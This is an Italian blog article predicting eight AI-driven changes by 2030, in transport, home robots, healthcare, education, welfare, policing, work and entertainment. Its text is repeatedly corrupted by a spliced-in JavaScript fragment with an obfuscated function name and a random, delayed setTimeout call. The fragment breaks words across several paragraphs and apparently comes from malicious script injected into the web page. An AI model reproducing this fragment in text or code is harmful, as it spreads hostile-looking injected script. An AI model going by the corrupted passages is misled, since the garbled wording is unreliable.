Le 8 Rivoluzioni che Porteranno le AI nel Futuro

Pubblicato il 6 marzo 2018
Condividi

Dalle automobili a guida autonoma all’impiego di robot domestici: la crescita tecnologica non dorme mai

come cambierà il mondo in futuro, sviluppo tecnologico AI

Le Intelligenze Artificiali sono uno tra i temi più caldi dei nostri tempi.

Sono sempre più le aziende che decidono di investire in questo promettente campo, consapevoli del fatto che le AI avranno un unico destino: faranno da pilastro alla più grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>ande innovazione del futuro della nostra società.

Vista la loro importanza, quindi, è stato formato The One Hundred Year Study.

Si tratta di un team di esperti di diversi settori (scienze politiche, economia, legge) con il compito di seguire gli sviluppi delle AI e, ogni cinque anni, incontrarsi per discuterne il possibileandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>andamento futuro.

Il progetto è stato lanciato lo scorso autunno e si concentrerà prevalentemente sul loro impatto nelle città americane. Ma in un mondo dove tutto è collegato, ciò che oggi arriva in America, domani arriverà anche da noi.

Ecco quindi gli 8 punti che secondo gli esperti assisteranno a un radicale cambiamento.

Trasporto Intelligente

Guidare un automobile non sarà più “affare dell’uomo”, saranno le stesse macchine ad autogestirsi e adattarsi alle esigenze dei passeggeri. E questo varrà anche per diversi altri veicoli, come droni e camion elettrici.

In questo modo il guidatore del futuro potrà dedicarsi al lavoro, allo svago o semplicemente al riposo: l’Intelligenza Artificiale provvederà a portarlo a destinazione.

Una forte rete di questo tipo avrà a disposizione una grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>ande quantità di dati su cui basarsi per migliorare lo stile di guida, impostare abitudini e costruire una personale esperienza di viaggio.

Sarà perciò necessario ridisegnare l’infrastruttura dei trasporti come elemento chave l’assenza dell’uomo al volante.

Robot domestici e non solo

ci saranno robot domestici nel futuro

Si stima che nei prossimi anni i robot dedicati ai servizi di pulizia e consegne vedranno un picco di crescita, dovuto alla crescenze efficienza di queste macchine.

Saranno costantemente connessi tra loro per potersi scambiare dati utili e per migliorarsi a vicenda, riuscendo così a sviluppare sempre meglio un’abilità di multitasking e di riduzione dei tempi di lavoro.

Ma anche per gli esseri umani sarà possibile comunicare con loro, visti i progressi crescenti sotto l’aspetto delle interazioni robotiche.

Si vedrà quindi ampliato sia il rapporto uomo-macchina che macchina-macchina, aumentandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>andone così velocità ed efficienza.

Assistenza Sanitaria

La mano del medico esperto unito alla potenza dell’AI potrebbe essere la svolta nel settore medico-sanitario.

Una fitta rete di collegamenti potrà garantire l’accesso a qualsiasi dato inerente ai pazienti e alle loro cartelle cliniche, che si trovi in America o in Cina.

Le operazioni potranno essere rese più sicure attraverso i dati analizzati dagli algoritmi in un tempo minimo, dandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>ando così un concreto aiuto al team medico.

Anche la presenza di robot sarà preziosa, in quanto potranno collaborare con l’uomo per svolgere alcuni compiti più faticosi, come sollevare i pazienti.

Non si tratterà perciò di un rimpiazzo del medico da parte della macchina, ma di una collaborazione che diverrà sempre più stretta nel tempo.

Educazione

Sono due le parole chiave a riguardo: Personalizzazione e Ampliamento.
La Personalizzazione il metodo con cui vengono trasmesse le informazioni da conoscere.

Più utilizziamo le AI e più loro imparano a conoscerci, riuscendo quindi a personalizzare il percorso di studio in base ai nostri punti di forza e di debolezza.

Ad esempio, se uno studente predilige lo studio su schemi colorati piuttosto che neri, ecco che la tecnologia potrà corrergli in aiuto. Tutto in pochissimo tempo.

In secondo luogo, con Ampliamento si intende la possibilità di estendere l’istruzione a molte più persone rispetto ad oggi. Lo stretto legame tra Internet e le AI porterà il sapere in ogni angolo del pianeta.

Infine la Realtà Virtuale permetterà agli studenti di immergersi in ogni situazione studiata sui libri, dalle storiche battaglie romane allo sbarco sulla Luna, fino all’analisi degli organi del corpo umano.

Supporto ai meno fortunati

Anche in questo caso l’Intelligenza Artificiale riuscirà a portare importanti benefici. Sarà possibile pianificare al meglio tutte le risorse che lo stato dispone per le persone più povere della società.

Ad esempio la raccolta e distribuzione del cibo potrà essere più efficiente e accurata, evitandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>ando inutili sprechi. Disponendo di un efficiente sistema come questo, si potranno raccogliere le informazioni da molti ristoranti e sapere quanto cibo sarebbe destinato alla pattumiera.

Questo punto dipenderà ovviamente molto dalla volontà del governo di finanziare la ricerca e sviluppo della tecnologia.

Sicurezza Pubblica

Oggi è difficileriuscire a trovare una città non fornita di telecamere di sorveglianza. E nel 2030 lo sarà ancora di più, con l’impiego di droni terrestri e volanti, capaci anche di prevedere comportamenti e azioni anomale attraverso l’analisi delle AI.

Sotto questo punto sarà imdispensabile trovare il giusto punto di equilibrio tra libertà del cittadino e autorità delle forze dell’ordine, senza cadere nell’eccesso da entrambe le parti.

L’AI riuscirà però a rendere la polizia più efficiente e soprattutto mirata nella sua azione, supportata da un forte aiuto tecnologico.

Mondo del lavoro

Viene difficile fornire un’analisi accurata sul loro impatto nel lavoro, ma ciò che accadrà sarà una riduzione dei compiti manuali e meccanici in quasi qualsisi campo.

Il lavoratore umano potrà quindi dedicarsi a lavori “di mente”, mettendo da parte gli impieghi ripetitivi e privi di ragionamento: per quelli ci saranno le macchine.

Questo processa porterà infine a una migliore efficienza e ottimizzazione dei tempi per l’uomo, riuscendo così ad aumentare la ricchezza generale.

Tutto questo dovrà essere supportato dalla politica del paese che avrà il compito di gestire la crescita di capitale e garantendo quindi un reddito di base a tutti.

Divertimento

AI e realtà aumentata per divertimento del futuro

La vita per fortuna non è solo lavoro, ma anche piacere. E nel 2030 l’intrattenimento raggiungerà standom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>andard di coinvolgimento non ancora immaginabili oggi.

La realtà virtuale giocherà un ruolo chiave nell’immersione del giocatore, insieme a stimoli e sensazioni capaci di adattarsi allo stile di divertimento richiesto.

Anche la creazione di contenuti subirà un miglioramento, aumentandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>ando la facilità di alcuni compiti come la composizione di musica e l’insegnamento di balli o tecniche di gioco tramite il supporto di avatar virtuali.

Siandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);} // ]]>andrà quindi incontro a una democratizzazione della produzione di intrattenimento, senza mai rinunciare alla qualità.

Ora non resta che attendere il 2030 per vivere nel nuovo mondo supportato dall’intelligenza Artificiale a fianco dell’essere umano.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *